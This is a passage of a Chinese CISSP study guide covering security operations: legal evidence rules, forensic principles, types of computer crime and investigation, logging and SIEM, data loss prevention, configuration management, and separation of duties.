在法庭上可用的证据有 3 种类型: ①实物证据 Real Evidence 实物证据也被称为客观证据(object evidence),包括那些可能会被实际带到法庭上的 物品。如凶器、衣物、键盘、硬盘等。 ②文档证据/书面证明 Documentary Evidence 文档证据包括所有带到法庭上证明事实的书面内容。如系统日志等。 使用文档证据,除了“想必发”3 个基本要求外,还必须遵从 2 项基本规则: 一是最佳证据规则 best evidence rule(复印无效)。当文档作为法庭处理的证据时, 必须提供原始文档,复印件没有法律效应。 二是口头证据规则 parol evidence rule(口说无凭)。当双方的协议被以书面的形式记 载下来时,一切口头协议都是无效的,只认书面。 ③言词证据/供述陈词 Testimonial Evidence 言词证据十分简单,就是证词的证据,证词既可以是法庭上的口头证词,也可以是记录存 储的书面证词。 有很多关于证据的原则和合法规则经常考到,实在搞球不清楚,不翻译了。 5.犯罪调查的三要素: ①情报,Information accumulation 信息累积:是调查的基本要素。 ②工具,Instrumentation:工具在调查财务等相关犯罪时,要用的扫描、采集等各类计 算机系统和其它工具软件和设备。 ③访谈,Interviewing:深入了解动机想办法套话,尤其对内部人员。 (望闻、问、切) 6.访谈/采访/录口供 没什么好说的。 7.电子取证原则 数字证据科学工作组(SWGDE)是一个国际组织,它设计的通用准则被用于 8 国集团(G8) 作为计算机取证和数字/电子取证的 6 大原则(A.3 章节又重复强调了一遍): ①合规性。处理数字证据时,必须遵循所有通用取证的程序原则。 —184— ②完整性。查封数字证据时,所采取的行动不得改变证据。 ③有能力。访问原始数字时,该人必须受过专门培训。 ④可审计。保管数字证据时,扣、访、存或传等所有活动,必须被记录,以供审查。 ⑤可问责。某人拥有证据时,要对其一切操作行为负责。 ⑥通用性。任何的组织机构,扣、访、存或传证据必须合规,并承担责任。 8.证物磁盘管理员的 4 大职责 forensic disk Controller performs 4 functions ①写保护、防篡改。Write blocking, intercepts write commands sent to the device and prevents them from modifying data on the device. ②取数据。returning data requested by a read operation。 ③查访问日志。returning access-significant information from the device。 ④报情况给取证专家。reporting errors from the device back to the forensic host. A.2 报告与记录 如果一个事件响应小组怀疑事件己经发生,他们应该开始记录有关该事件的信息。任何和 事件有关的信息应该被记录并带有时间戳。所有的文件应当注明日期并由调查人员签名。事件 响应团队一直需要注意对于任何范围的数据或系统被调查,应该使用适当的采集技术,正如上 面讨论的。 搞通信运维或网络管理的都知道,机房台站的值勤值班都必须要做好表报资料的登统计 (这就是记录);还必须及时请示上报重要情况(这就是报告)。 A.3 调查技术 (例如:根本原因分析、事件处理) 1.计算机犯罪的主要类别 Major Categories of Computer Crime 计算机犯罪是与计算机相关的违反法律或法规的犯罪行为,通常分为 6 类: ①军事和情报攻击 Military and Intelligence Attacks(国安) 军事和情报攻击主要用于从执法机关或军事和技术研究机构获得秘密和受限的信息。这些 信息的暴露可能使研究泄密、中断军事计划甚至威胁国家安金。收集军事信息或其他敏感信息 的攻击常常是其他更具破坏性攻击的前兆。在“震网”事件后,网络空间作战更加意义重大了, 而且形成了“高级持续性威胁”(ATP 攻击)Advanced Persistent Threats。攻击者拥有资 金,并拥有先进的技术技能和资源。他们代表一个民族国家、犯罪组织,恐怖组织,或其他发 起人,对一个非常集中的目标进行持续有效的攻击。 ②商业攻击 Business Attacks(窃密) 商业攻击专门非法获取公司的机密信息。对竞争者机密信息的收集也称做工业间谍活动。 ③财务攻击 Financial Attacks(偷钱) 财务攻击被用于非法获得钱财和服务。财务攻击的目标可能会是增加银行账户中的存款, 或者是免费打长途电话。 ④恐怖攻击 Terrorist Attacks(暴乱) 恐怖攻击实际上存在于我们这个社会的很多领域。这种攻击有别于军事和情报攻击,恐怖 攻击的目标在于中断正常的生活和制造恐怖气氛,而军事和情报攻击被用来获取秘密信息。计 —185— 算机恐怖攻击的目的可能是控制电厂、控制电信或者造成电力中断。 ⑤恶意攻击 Grudge Attacks(报复) 恶意攻击可以对组织机构或个人造成破坏。破坏可能是信息的丢失或信息处理能力的丧 失,也可能是组织机构或个人名誉的损害。恶意攻击的动机通常来自于不满,并且攻击者可能 是现在的或以前的员工,也可能是希望组织机构不能正常运作的人。 ⑥兴奋攻击 Thrill Attacks(破坏) 兴奋攻击是由具有很少技能的破坏者所发起的攻击。缺乏自己设计攻击的能力的攻击者常 常会下载使用某些程序来进行攻击。这些攻击者常常被称作“脚本小子”script kiddies,因 为他们只运行他人的程序或脚本而发起攻击。这些攻击的动机是闯入系统的极度兴奋。如果你 是兴奋攻击的受害者,那么所遭受的最常见打击就是服务的中断。虽然这种类型的攻击者可能 会破坏数据,但是其主要的动机还是破坏系统,并且可能使用该系统对其他受害者发起拒绝服 务攻击。 A.4 数字取证 (例如: 介质、网络、软件和嵌入式设备) 1.基础知识 国际计算机证据组织(International Organization on Computer Evidence, IOCE),目 的是制定收集和处理数字证据的国际原则,从而使各国的法庭都同样认可和使用这些证据。 数字证据科学工作组(Scientific Working Group on Digital Evidence, SWDGE),美国 的机构,也可以确保取证团体之间的一致性。 警务管理协会(Association of Chief Police Officers,ACPO),提供了标准的电子取证 流程和方法指南。 IOCE/SWDGE 的取证 6 大原则是: ①合规性。处理数字证据时,必须遵循所有通用取证的程序原则。 ②完整性。查封数字证据时,所采取的行动不得改变证据。 ③有能力。访问原始数字时,该人必须受过专门培训。 ④可审计。保管数字证据时,扣、访、存或传等所有活动,必须被记录,以供审查。 ⑤可问责。某人拥有证据时,要对其一切操作行为负责。 ⑥通用性。任何的组织机构,扣、访、存或传证据必须合规,并承担责任。 2.介质分析 Media Analysis 介质分析是计算机取证分析的一个分支,就是识别和提取各种存储介质中的信息。应当为 原始介质创建 2 个副本:一个主镜像,这是保存在库中的控制镜像;一个工作镜像,它用于分 析和证据收集。 3.网络分析 Network Analysis 网络取证(分析)这个术语是在 1997 年由 Marcus Ranum 提出,指的是分析和审查网络日志 和网络活动数据来找出潜在的证据。数字证据的大范畴包括了许多类别,如软件取证/分析, 网络分析或网络取证。网络活动分析是一种功能,在任何事件响应的情况和过程模型都是相同 的,在之前的“事件响应’一模块中己经讨论过。关键特征是证据的有效管理和处理(即监管 链),是关注任何来源的证据在法律程序中是否被接纳。 —186— 4.软件分析 Software Analysis 软件分析和取证是指分析和检查程序代码。被分析的代码可以以源代码的形式一编译后的 代码(二进制文件),或机器代码。反编译和逆向工程技术经常被用作这个过程的一部分。软件 分析等调查活动包含恶意软件分析、知识产权纠纷、版权侵权行为等等。分析的目标包括作者 标识,内容分析/语境(有效载荷),和上下文分析。 5.硬件和嵌入式设备的分析 Hardware/Embedded Device Analysis 硬件和嵌入式设备的分析通常涉及到移动设备,如智能电话或个人数字助理(PDA),在笔 记本或台式计算机的主板可以发现标准的硬件和固件如 CMOS 芯片用于控制基本功能,同时需 要被取证拍摄并进行检查。嵌入式设备的成像是需要专用的工具和技术。需要注意的是,许多 嵌入式设备无法读取或复制,他们希望获得和不改变这些重要信息。 6.作者的身份识别 作者身份识别,或者更准确地说作者归属,试图确定谁是创建或撰写软件/程序的作者(这 是一个个人或小组工作)。代码检查的线索有,编程风格,程序语言,开发工具包使用嵌入的 注释和地址等。基本的理论是,编写代码类似于散文写作,每个作者都有独特的风格和怪癖, 可以让研究者区分各种潜在的犯罪嫌疑人。 7.内容分析 内容分析以分析系统代码为目的。以一个木马程序为例,要重点确定用来做什么样的攻击, 文件应安装在受感染系统的哪个位置,开放什么样的端口(出口和入口),如何识别上游目标地 址,什么信息被批量上传发送或本地存储等等。内容分析也用于知识产权纠纷案件。在这些情 况下,检查源代码或反编译二进制需要一个辛苦的检查,用来确定两个程序之间的相似性。研 究者往往要求提供相似的程序,专家基于什么基础提供意见。内容分析处理相对于案例环境中 发现一元视图可疑软件的影响。理解内容可以协助分析,可用于组织发现风险或对受害者进行 真实评价。 B.理解调查类型的要求 详细内容见第一域 D 章节 调查的类型有 5 种,就是后面这 5 种,没什么考的内容。 B.1 运营 操作型调查 Operational Investigations 企业组织的内部业务问题,一般是系统运维、内部审计等人员干的,只针对内部的信息系 统,不涉及其它企业也不涉及政府,其目标是解决系统问题、业务问题和管理问题。所以取证 工作并不严格,通报事件并解决就行了,除了个别事件是涉及外部、严重的犯罪的,那就不是 简单的事了。 B.2 刑事 犯罪调查/刑事调查 Criminal Investigations 犯罪调查通常是由法律执行者进行的,针对违法行为的调查。犯罪调查的结果是指控犯罪 和这些指控在刑事法庭的控诉。刑事调查必须遵循非常严格的证据收集和保存的过程。 —187— B.3 民事 民事调查 Civil Investigations 民事调查通常不涉及执法,是企业内部和企业之间请律师来自己解决问题。民事调查的证 据收集标准并不像那些在犯罪调查中要求的那么严格。 B.4 法规 监管调查 Regulatory Investigations 政府职能机构来做的调查,就是政府认为个人或企业可能违反法律时,提起公诉并执行监 管调查。 B.5 电子发现 电子发现/电子披露是一种独特的网络调查。 1.电子发现 Electronic Discovery 任何组织有责任保留各种有用的电子证据,即日志记录什么的,并在法律需时通过“电子 发现”过程来提供和分享信息。这个发现的过程包括纸质档案和电子记录的查找,以及各种自 动化、数字化、网络化的数字取证或电子发现(e-Discovery)过程。 2.电子发现参考模型(EDRM)Electronic Discovery Reference model EDRM 的流程步骤: 信息管理=>身份识别/鉴定=>①保护+②收集=>①处理+②审查+③分析=>制作=>呈现/演示 在捕捉嫌疑人的活动中,诱骗是合法的和道德的,而圈套既不合法也不道德。蜜罐用来避 开攻击是合法的,用来提起诉讼是非法的。也就是说伪装保护自己的可以的,钓鱼执法搞人是 不行的。 C.实施日志和监测活动(行为记录和监控活动) 考日志重点涉及到 IDS/IPS、SIEM、连续监测服务 CMaaS、出口监控、数据泄漏/丢失保护 (DLP)。都在后面章节里讲了。当然也有防火墙、补丁管理、防病毒什么的,都类似。 1.日志技术 日志记录是将事件的信息记录到日志文件或数据库的过程。日志通常被称为审计日志,而 日志记录通常被称为审计日志记录。不过日志记录只是记录事件,而审计会检查其所处环境。 2.保护日志数据 如果攻击者可以修改日志,他们便能够擦除自己的活动痕迹。要保护好。 3.监控技术 Monitoring Techniques 监控是一种检查信息日志并寻找具体某些细节的过程。工作人员可以手动查看日志,或使 用工具来自动处理过程。监控是必要的,以检测恶意行动,以及入侵和系统故障。它可以帮助 重建事件,提供起诉的证据,并创建分析报告。日志分析是监测过程中一种详细且系统化的模 式,日志分析能够分析监测记录信息的趋势、模式,还能够分析未经授权的、非法的、违反政 策的活动。日志分析不一定是对一个事件的响应,而是一个周期性的任务,它可以检测潜在的 —188— 问题。 4.审计 Auditing 许多时候,一个组织将会通过审计的方式评估其安全政策和相关的访问控制。审计是对环 境有条理地检查或审查,以确保其符合法规和并能够检测异常、未经授权的事件,或犯罪。它 验证部署在环境中的安全机制能否提供足够的安全性。测试过程确保工作人员遵循由安全策略 或其他规则所制定的要求,并且在部署的安全解决方案中不存在重大漏洞或弱点。 审计在信息技术安全性背景下有两种不同的的含义,即审计与审查,认识差异是很重要的。 ①审计是指利用审计日志和监控工具来跟踪活动。例如,当任何用户访问文件时,审计日 志可以做出记录,并记录该用户的使用过程。(找用户行为的问题) ②审计也指检查或评估。具体地说,审计是对一个特定的过程或结果的检查或评价,以确 定一个组织是否遵循特定的规则或准则。(找管理机制的问题) 审计也有几种类型: ①检验审计 Inspection Audits 安全信息技术环境很大程度上依赖于审计,将其作为一个侦探安全控制机制,以发现和纠 正漏洞。用于访问控制的两个重要的审计分别是访问审查审计和用户权限审计。 ②访问回顾审计/访问审查审计 Access Review Audits 许多单位定期进行访问审查和审计,以确保对象访问和帐户管理符合安全策略要求。这些 审计能够检查用户。以确保其没有过多的权限,并能够适当地管理帐户。他们确保监管流程和 程序都正常运行,人员会对他们进行跟踪。就是要对访问控制的管理和审查进行审计 ③用户权限审计 User Entitlement Audits 用户权限是指授予用户的权限。用户需要权利和权限来完成工作,但他们只需要有限数量 的特权。要遵守最小特权原则。 ④特权组审计 Audits of Privileged Groups 要确保高级别小组成员只有在必要时才使用他们的高特权帐户。审计可以帮助确定这些人 员是否遵循这些政策。 5.安全审计和复核 Security Audits and Reviews(搞清区别) 安全审计有助于帮助单位确定正确地实现了安全控制。访问审查审计能够评估访问控制的 有效性。这些审计确保帐户管理适当,没有过多的权限,并在需要时会被禁用或删除。下面是 一些常见的检查项目(在该域后面的 I、J 等章节时会逐个讲这些内容的): ①补丁管理 Patch Management。(补丁可用) 补丁管理审查能够在补丁发布后,尽可能快的对其进行评估、测试、批准、部署和验证补 丁程序。在补丁管理审查或审计中漏洞扫描报告是很有价值的。(补丁管理的过程不包括“部 署所有补丁”这个内容。) ②漏洞管理 Vulnerability Management。(漏洞已补) 漏洞管理审查能够确保漏洞扫描和评估定期按照既定的准则定期执行。审查将验证在扫描 中发现的漏洞问题已经得到解决。 ③配置管理 Configuration Management。(应对变更) 系统可以定期进行审核,以确保原始配置不被修改。配置管理审计可以检查任何变更的日 —189— 志,并验证此变更是否经过授权。 ④变更管理 Change Management。(实施变更) 变更管理审计能够确保变更符合单位变更管理政策。其中通常包括中断审查,以确定原因。 由未经授权的变更导致的中断意味着变更管理程序需要改进。 6.审计跟踪/行为记录 Audit Trails(事件溯源) 审计跟踪指的是关于事件和突发事件的信息,它存储在一个或多个数据库或日志文件中。 审计跟踪提供了系统活动的记录,并可以重建导致安全事件的活动。安全专家提取事件的审计 线索来证明或反驳责任信息。审计跟踪允许安全专业人员检查和跟踪事件的正向或反向顺序。 使用审计跟踪是一种被动的检测性安全控制形式,只是作为一种威慑力量。 C.1 入侵检测与预防 详见 H.2 章节 C.2 安全信息与事件管理 Security Information and Event Management 1.安全信息和事件管理 许多单位使用一个集中的应用程序来自动监控网络上的系统,如安全信息和事件管理系统 /安全事件信息管理系统(SIEM)、安全事件管理系统(SEM)和安全信息管理系统(SIM)等。 这些工具为单位提供了对系统事件的实时分析。例如,SIEM 可以监视一组电子邮件服务器, 会检查某事件以确定它是否是一个和利益有关的项目,并根据事件的严重性,依次提高向管理 员的告警。该工具还可以从目标系统收集所有的日志,并使用数据挖掘技术来检索相关的数据。 SIEM 产品的目的是提供一个公共平台,进行日志收集,整理,实时分析,允许更有效的响应。 他们还可以提供来自多个源的日志信息报告。安全信息和事件管理(SIEM)是一个术语,用来描 述一组技术析综合信息系统的访问控制和选择存储活动的相关性,用于分设备日志和系统信息 的收集。日志和系统信息可以以各原因来收集。SIEM 和日志分析工具是快速将两个区域合并 成一个功能空间,通常一个 SIEM 具有以下特点: ①存储来自不同系统的原始信息日志 ②汇总单个存储库的信息 ③规范化信息的比较更有意义 ④分析工具可以处理映射和提取目标信息 ⑤警报和报告工具 2.日志管理系统 日志管理系统比较相似:他们有收集日志和提供报告的能力,虽然他们的重点往往是对日 志信息的历史分析,而不是实时分析。他们可以结合 SIEM 解决方案提供历史和实时功能。 3.SIEM 和日志管理 在这两种情况下,必须谨慎地对管理日志信息进行安全操作,必须保持严谨的日志存储和 归档。对于大多数 SIEM 或日志管理系统而言,对信息量做出一个实际的限制,他们就可以分 析一次或产生针对的报告。对于大多数系统,有一种解决方案,只有一小部分的剩余日志可以 转移到在线存储,这样可以进入长期存储或归档。这些解决方案存储在线日志可以长达 10 到 180 天,他们移到一个在线或近乎线性的存档长达一年,然后移动日志进行长期备份,去覆盖 —190— 保留期的剩余部分。在这段时期结束时,安全操作员负责使用定义的数据处理程序和工具来确 保旧的日志信息、被正确处理。 C.3 连续监测 CMaaS 持续监测也是云服务的一种,是一种风险管理的方法,允许一个机构对其风险状况作出持 续地描述。持续监测作为一种服务(CMaaS)是关于一个感兴趣领域的持续监测。最初需要此服 务的是美国联邦政府重点的网络防御和正在建造的基础设施服务需求。连续诊断和缓解(CDM) 项目提供专业化的信息技术(IT)的工具,并使用 CMaaS 打击针对平民“.gov”网络的威胁。CDM 方法遵循合规报告和应对实时威胁国家的基础网络,自动化监控工具将允许获得整个联邦企业 的安全相关信息并进行分析。 C.4 出流监测(例如:数据丢失防护、信息伪装、数字水印) 出流监测/出口监测是指监测传出的流量,防止数据泄露,也就是防止单位数据未经授权 的外泄。防止数据泄露的一些常见的方法有使用数据丢失防护技术,寻找隐藏的企图,并利用 水印检测未经授权的数据。 1.数据泄露保护 Data Loss Prevention 数据丢失防护(DLP)系统能够检测和阻止数据地露的企图。这些系统有扫描数据、寻找关 键字和数据模式的能力。DLP 系统有两种主要类型:基于网络的 DLP 和基于终端的 DLP。DLP 系统通常具备进行深层次检查的能力。例如,如果用户将文件压缩成 ZIP 压缩文件,仍然可以 检测到关键词和模式。(国安局什么的部门都有这种系统) DLP 有三个关键目标: ①企业敏感信息的查找和分类存储(存储数据)(静态数据)Data at Rest。 ②监控和控制企业网络敏感信息的流动(网络数据)(动态数据)Data in Motion。 ③监视和控制用户系统敏感信息的流动(用户数据)(数据使用)Data in Use。 DLP 有 5 个基本功能: ①策略建立和管理 Policy Creation and Management; ②集成目录服务 Directory Services Integration; ③工作流管理 Workflow Management; ④备份和恢复 Backup and Restore; ⑤报告 Reporting。 这些目标与三种类型的信息相关:静态数据、动态数据和数据的使用。相应解决方案如下: ①静态数据 Data at Rest:大多数的 DLP 系统利用爬虫,搜索己进入 DLP 管理控制台的 数据,基于一组有规则并记录其位置的特定信息集合。也就是信息过滤系统。 ②动态数据(网络) Data in Motion (Network):使用特定的网络设备或嵌入式技术选择 性地捕获和分析网络流量,检查通过网络发送的信息,这种能力的核心是一个称为深层数据包 检测(DPI)的方法,使 DLP 数据可以动态组件来完成这些任务。DPI 通过超出一个分组的基本 报头信息来读取数据包的有效载荷内的内容。这种DPI功能允许DLP系统来检查传输中的数据, 并确定内容,源和目的地。如果检测到敏感数据流向一个未经授权的目的地,DLP 解决方案具 —191— 有提醒和阻塞数据流,再根据中央管理组件中定义的规则集进行控制。也就是流量分析系统。 ③使用数据(终端) Data in Use (End Point):DLP 最具挑战性的方面可能是数据的使用。 数据的使用主要是指监控终端用户的数据运动并采取行动是否需要将数据复制到 U 盘,将信息 发送到打印机,甚至在应用程序之间剪切和粘贴。DLP 解决方案通常通过使用称为代理的软件 程序来实现这个功能,也就是主机监控系统。 2.消息隐藏/信息隐藏 Steganography 隐写术 Steganography 指的是在一个文件中嵌入消息。一般写入图片、声音、视频什么的, 也可以使用隐蔽通道。隐写术涉及 3 类组件: ①载体——内部具有隐藏信息(有效载荷)的信号、数据流或文件。 ②隐写介质——将信息隐藏在内的介质。 ③有效载荷——要隐藏和传输的信息。 下面的公式描述了一个通用的隐写过程: 覆盖介质+隐藏数据+密钥=隐秘介质 3.水印 Watermarking 水印指的是在纸上嵌入不容易感知的图像或图案,它经常被用来防止伪造货币,也用来防 止了单位文件的泄露。数字水印是一种比较先进的水印方式。数字水印是一种在数字文件中秘 密嵌入的标记。例如,一些电影公司对发送给不同分销商的电影嵌入数字水印,每个副本都有 一个不同的标记且可以追踪哪个分销商收到了哪份副本。如果有分销商发行盗版电影,工作室 便能够确定是哪家分销商。 D.保护资源的供给安全(通过配置管理确保资源的供应和安全) D.1 资产清单 (例如:硬件、软件) 有形资产和无形资产很容易理解,CISSP 一般会提到两个单词: ①硬件 hardware:就是设备啦。 ②介质 media:硬盘、软盘、光盘、纸张、胶片等。 清单有助于验证系统、软件和网络上设备的完整性,从两个视角了解网络组件的硬件版本。 此外在执行网络扫描时,对比清单,可以发现网络中未经授权的设备。 1.硬件清单 Hardware Inventories 贯穿设备的整个生命周期,许多组织使用数据库和库存应用程序来清点库存和跟踪硬件资 产。例如,条形码系统可以打印条形码并放置在设备上,也能使用无线射频识别(RFID)标签。 在设备处理之前要进行人工净化:清除设备中所有数据,以确保未经授权的人员不会访问到敏 感信息。 2.软件清单 Software Inventories 软件清单至少包括:软件名称/软件供应商(和经销商如合适)、密钥或激活码(注意,如果 有硬件密钥)、许可证的类型和版本/祥拥有许可证/许可证失效、移动的许可、组织软件库或 资产管理/安装软件的联系人等。 也应该对每个设备配置维护清单,设备如防火墙,路由器和交换机,可能会有成百上干的 配置。要正确记录和跟踪更改这些配置清单,以保证对网络提供完整性和可用性。 —192— 3.软件许可 Software Licensing 购买软件,要使用许可证密钥来激活软件。因此,对组织来说任何类型的许可证密钥都是 非常重要的,需要加以保护。 D.2 配置管理 配置管理 Configuration Management,CM 有助于确保系统处于一致安全的状态,并在其 整个生命周期维护这种状态。它是评估、协调、批准或不批准,以及实施变更,用以构建和维 护软件系统的过程。 1.基线 Baselining 基线是一个起点。在配置管理中,它是一个系统的初始化配置。管理员为了满足不同需求 经常在完成系统部署之后修改基线。然而,当系统被部署在一个有安全基线的状态下,系统会 更安全。基线就是组织自己的针对系统安全的一套安全配置规范。例如,微软操作系统包括组 策略。管理员可以单次配置一个组策略,之后组策略会自动将设置应用到域中的所有计算机上。 基线有 2 个:配置基线和安装基线(镜像)。 2.用镜像创建基线 Using Images for Baselining 许多组织使用镜像来创建基线,有三个步骤: ①初始。起初,管理员在计算机上安装操作系统和所有所需的应用程序,并对系统进行相 关的安全配置以满足单位的需求。在继续下一步之前,将进行人工测验来确保系统正常运行。 ②镜像。接着,管理员制作系统的镜像,存储在镜像服务器中,或外部存储设备。 ③部署。然后,根据需要,使用镜像来部署各个用户系统,使所有系统的整体配置同基线 系统是相同的。 所以,每个单位都应该裁减定制适合自己的、安全的操作系统,并做成镜像安装文件,确 保所有的终端都安装了自主可控的,符合安全基线的系统和软件。 3.配置管理的软件能力成熟度模型 SEI 能力成熟度模型集成 CMMI,系统工程和软件工程的 1.1 版(CMMI-SE/SW,V1.1)列出了 一个组织有助于 CM 能力的最佳实践[SEI2000A]:内容就不粘贴了。 4.补丁和漏洞管理 Patch and Vulnerability Management 都很好理解,不多说。 D.3 物理资产 物理资产在信息技术硬件之外,包括所有的物理设施,如一个组织的建筑和它的内部设施。 保护实物资产的方法包括栅栏、路障、门锁、安保、闭路电视(CCTV)系统等。 D.4 虚拟资产(例如:软件定义网络、虚拟 SAN、来宾操作系统) 为了大幅节约成本,组织逐步使用越来越多的虚拟化技术。软件定义一切 Software defined everything (SDx)是指以软件代替硬件的虚拟化趋势。在此概念下的虚拟资产包括: ①虚拟机(VMs)Virtual Machines:虚拟机类似于物理服务器上的客户操作系统。 ②软件定义网络(SDNs) Software-Defined Networks:能够将控制平面从数据平面(或转 —193— 发平面)中分离出来。控制平面使用协议来决定向哪里发送信息,而载有规则的数据平面决定 是否转发信息。不同于传统的网络设备如路由器和交换机,SDN 控制器使用能够接收控制器指 令的简单的网络设备。这消除了一些与传统的网络协议相关的复杂性。 ③虚拟存储区域网络(VSANs) Virtual Storage Area Networks:是含有多个存储设备的 专用高速网络。他们经常与需要高速访问数据的服务器一起使用。很久以来,由于其复杂的硬 件要求,SAN 的价格居高不下。VSANs 通过虚拟化,降低了成本。 虚拟化中的主要软件组件是管理程序。虚拟机管理程序管理虚拟机、虚拟数据存储和虚拟 网络组件。作为物理服务器上的一个附加的软件层,它也是另外的一个攻击面。如果攻击者能 够破解物理机,那他就可以访问托管在物理服务器上的所有虚拟系统。 D.5 云资产 (例如:服务、虚拟机、存储、网络) 基于云的资产包括一个组织使用云计算访问的任何资源。云计算是指几乎可从任何地方提 供按需访问的计算资源,且云计算资源高度可用、易于扩展。搞清楚什么是 SaaS、PaaS、IaaS, 一般都有云服务提供商(CSP) cloud service provider 来负责。第三域 E.5 章节已经讲过那 些云了。再讲几种云部署的模型: ①公共云模型包括——可用于任何消费者租用的资产,并由外部 CSP 管理。 ②私有云部署模型包括——单位可以使用自己的资源创建和管理私有云。该单位负责所有 维护。然而,一个组织也可以从第三方租赁资源并按照服务模型(SaaS,PaaS 或 laaS )分割维 护职责。 ③社区云部署模型——为两个或多个单位提供云基础资产。维护责任根据对资产和服务模 型的管理来分配。 ④混合模型包括——两个或两个以上的云组合。类似于社区云模型,基于对资产和服务模 型的管理,维护责任共享。 D.6 应用 (例如:工作负荷或私有云、Web 服务、软件即服务) E.理解与应用安全运营的基础概念 准确的讲,这章是关于安全运作、安全操作的内容,不是安全运营,因为运营层次更高, 有部分管理的职能。 1.概念区分 ①运行安全(Operations Security),是指网络和系统保持安全、稳定、可靠、高效的 运行状态,能有效支撑保障各项公司业务的正常开展。(系统运行很安全) ②安全运营(Security Operations),是为了确保网络和系统的运行安全可靠,而实施 的一系列专业安防运维工作。也就是各单位的安防部门要干的事,如经常要做的预防(Prevent) 问题、监测(Detect)问题和处理(Correct)问题等。(安全运维很到位) ③操作/运营(Operation),这是个动词,就是对在用的网络或系统进行运行维护的具体 工作,这里主要指安全方面的维护。虽然有许多安全机制来保护系统,但也会出现很多故障, 所以必须进行维护操作。很多单位的安防中心就干这个事。 ④可信路径,为特权用户提供可以信赖接口的功能,目的是提供一种方法来确保任何通信 —194— 路径不被截取或损坏。例如,当用户登录到本地系统,他的凭据可以安全地通过从用户界面到 访问控制子系统来共享,这是很重要的。然而,许多攻击可以截获,泄露,或操纵,专门攻击 这样的信任路径重定向到另一个通道。这种攻击如果成功,那么会提高了攻击者的权限水平, 所以使用特权用户帐户非常危险。(这就是说登陆界面是可信的,不能被篡改)(可信路径在 讲操作系统内核与外界的通信时也有) 这章也涉及到故障安全机制的 Fail-Safe 和 Fail-Secure 概念,讲了好几遍了,很好理解, 在 K.2 章节有。 2.主要内容 总的来说,第七域的安全运营可以理解为是一系列的针对公司信息安全防护业务的管理与 运维工作。一般重点关注四个方面的工作(美国知识其实并不适用于中国): ①确保运维灵活、高效(弹性)maintaining operational resilience:就是及时有效的 预防、监测和应对突发事件,降低负面影响。 ②保护有价值的资产 protecting valuable assets:包括人、物、钱、数据。 ③实施访问控制(账号管控)controlling system accounts:避免权限滥用或误用。 ④有效管理安全服务 Managing Security Services Effectively:提供安防服务,实施 变更管理,分析评估报告什么的。 E.1 需者方知/最小权限原则(例如:权利、聚集、信任传递) 第五域的 E 章节已经把需知、最小特权、职责分离都说过了,这里不想再说了,本来就很 容易理解。还有聚合、信任传递的概念,也都说过了。 考题中关于信任传递会问到几种模式: ①单向信任 one-way trust:你的就是我的,但我的还是我的,不给你。 ②双向信任 two-way trust:互信互访。 ③信息可传递 transitive trust:信任可延动态目录树传递。 ④信任不可传递 nontransitive trust:信任固定,不能延动态目录树传递。 E.2 职责分离 1.职责和责任分离 Separation of Duties and Responsibilities 职责和责任分离确保没有单个人能控制一个关键功能或系统全部,但如果有共谋或串通违 反组织的行为,分离也没用,不过能极大的增加串通的难度和风险。 ①特权分离 Separation of Privilege 高等级的特权必须要分离。 ②职责划分 Segregation of Duties 有利益冲突的职能必须要分离。 ③双人控制 Two-Person Control 制类似于职责划分,是指关键任务必须由两个人同时完成。 在讲密钥管理时,也会讲到职责分离、双重控制、知识分离: ④双重控制 dual control。2 个或多人要同时一起来完成一个流程。(同控) —195— ②知识分离 split knowledge。密钥或资产要分发给不同的人来保管。(分管) E.3 监控特殊权限(例如:操作员、管理员) 确保账户及其权限进行适当分配和定期审查。常用的监控手段有: ①背景调查:定期的背景调查确保他或她的职责分配和授予个人的级别是适当的。 ②帐户验证:一个人从组织中离开,应该从系统中删除这些不活动的帐户;长期休假或临 时调离,应禁用这些不活动的帐户。 ③岗位轮换:岗位轮换可以减少个人之间共谋活动的风险。 要重点监控的特殊角色有: ①系统管理员 System Administrators 最小特权:系统管理员并不需要访问组织中的每个系统和功能。 监控:系统管理员的行动应记录并发送至不受系统管理员控制的一个独立系统。日志应该 按配置管理要求进行更改并进行审查,以确定只有经过授权的行为才能被发生。 防止欺诈行为:管理员不应该从事恶意活动并且没有欺诈的能力。 它是最高权限,所以没有职责分离。 ②操作员 Operators 操作员拥有很高的权限,但低于系统管理员,如果使用不当,这些特权可以用来规避系统 的安全策略,因此,应该监控这些特权的使用并进行日志审计。 最小特权:并不需要访问组织中的每个系统和功能。 监控:行动应记录并发送至不受操作员控制的一个独立系统。日志应该按配置管理要求进 行职责分离,更改并审查,以确定只有经过授权的行为才能被发生。 职责分离;不应该从事恶意活动并且没有串通作案的能力。 背景调查:应该进行背景调查,以确定这个操作者是否曾经有过勒索和敲诈行为。 ③安全管理员 Security Administrators 安全管理员是对系统安全操作进行监督的角色。安全管理员和系统管理员有必要一起进行 安全设置工作,因为一个不适当的配置可以影响系统或网络的正常运行。这些管理员通常比系 统管理员的权限要少。这是必要的,以确保执行职责分离。安全管理员提供一种权力制衡,为 系统管理员提供审计和审查其活动。 ④帮助/服务台人员 Help/Service Desk Personnel 帮助/服务台人员负责为所有用户提供一线的支持。作为技术支持人员往往需要有重置密 码的能力,有必要对他们进行监控和背景调查。 第一域的 B.3 章节、第二域的 B 章节等,到处都讲到了“数据所有者”等等各种角色,前 后关联起来看,数据所有者、系统监管员、安全管理员等的关系是必考的。 E.4 岗位轮换 1.工作轮换 Job Rotation 工作轮换简单的讲就是轮换职责,或者至少某些工作职责被轮换到不同的雇员。这可以实 现并行审查、减少欺骗并促进交叉培训。工作轮换既能作为一个威慑也能作为一个检测机制。 —196— 提供人员的备份(Backup)和冗余(Redundancy)。 2.强制休假 Mandatory Vacations 这将提供一个并行互审的形式,并且有助于检测欺诈和共谋。该策略确保了其他雇员接替 一个人的工作职责至少一个星期的时间,如果一个雇员涉及欺诈,接替该职责的人将会发现该 欺诈。强制休假既能作为一个威慑也能作为一个检测机制。强制假期具有突然性(Unexpected), 使欺诈者(Fraud)没有时间来掩盖欺诈痕迹。 E.5 信息生命周期 信息生命周期是用于管理和存储数据的方法,信息随时间而改变,必须进行相应的管理。 1.生命周期一般分六个阶段: 创建和接收——分发(存储/备份)——使用——维护——披露——处置(转让,安全处理) 安全控制要保护整个生命周期内的信息,包括标记、处理、存储和数据恰当销毁。 ①标记 Marking Data 数据标志(或标签)确保用户能很容易的识别数据的价值。除了外部系统的标记外,企业组 织也经常配置壁纸和屏幕保护来清晰的表明在系统中处理数据的等级。 ②处理 Handling Data 数据处理主要涉及到数据的传输,并且关键是在传输过程中提供与数据存储时相同级别的 保护。在发送数据之前对其进行加密来提供这种数据保护。 ③存储 Storing 